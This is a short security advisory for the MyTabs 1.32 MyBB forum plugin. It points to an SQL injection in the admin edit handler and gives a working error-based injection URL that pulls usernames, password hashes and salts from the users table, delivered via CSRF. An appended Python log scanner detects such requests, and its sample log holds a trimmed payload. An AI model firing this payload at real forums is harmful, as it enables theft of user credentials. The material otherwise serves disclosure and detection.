# Version 1.32
Introduction
------------
MyTabs is a somewhat advanced plugin that allows the user to organize their forums through tabs.
SQL injection
-------------
admin/modules/forum/mytabs.php L.322
if($db->update_query('mytabs', $tab, "id='".$mybb->input['id']."'"))
Proof of concept
----------------
You must go through a CSRF, with a small data grabber at the end, to get the data back through HTML code generated by the injection.
Error-based SQL injection: http://[site]/admin/index.php?module=forum-mytabs&do=edit&id=1%27%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28select%20concat%28username,%200x3a,%20password,%200x3a,%20salt,%200x3a%29%20from%20mybb_users%20limit%201%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29--%20-
Groucho
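A detection check for the request pattern described above, added here as an example and not part of the original advisory or the plugin: it scans web access logs for `module=forum-mytabs` requests whose `id` parameter is not a plain integer. The function name, the combined log format and the sample lines are assumptions, as is the premise that legitimate tab ids are always integers.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log line: "GET /path?query HTTP/1.1".
# Only the query string is inspected; POST bodies are not present in access logs.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
INTEGER_RE = re.compile(r"[0-9]+")


def suspicious_mytabs_ids(log_lines):
    """Return (line_number, decoded_id) for every MyTabs admin request whose
    id parameter is anything other than a non-negative integer."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        # parse_qs percent-decodes values, so %27 is seen as a quote character.
        params = parse_qs(query, keep_blank_values=True)
        # Match on the module name rather than the path, because the
        # MyBB admin directory can be renamed.
        if "forum-mytabs" not in params.get("module", []):
            continue
        for value in params.get("id", []):
            if not INTEGER_RE.fullmatch(value):
                hits.append((number, value))
    return hits


# Constructed sample log lines (addresses, dates and sizes are made up).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2014:13:55:36 +0000] '
    '"GET /admin/index.php?module=forum-mytabs&do=edit&id=7 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Oct/2014:13:56:02 +0000] '
    '"GET /admin/index.php?module=forum-mytabs&do=edit'
    '&id=1%27%20and%20%28select%201%29--%20- HTTP/1.1" 200 812',
    '198.51.100.9 - - [10/Oct/2014:14:01:10 +0000] '
    '"GET /admin/index.php?module=forum-management&id=abc HTTP/1.1" 200 900',
    '198.51.100.9 - - [10/Oct/2014:14:02:44 +0000] '
    '"GET /index.php?id=2 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for line_number, decoded in suspicious_mytabs_ids(SAMPLE_LOG):
        print(f"line {line_number}: non-integer MyTabs id: {decoded!r}")
```

A hit that carries a `Referer` from an external site is consistent with the CSRF delivery the advisory describes.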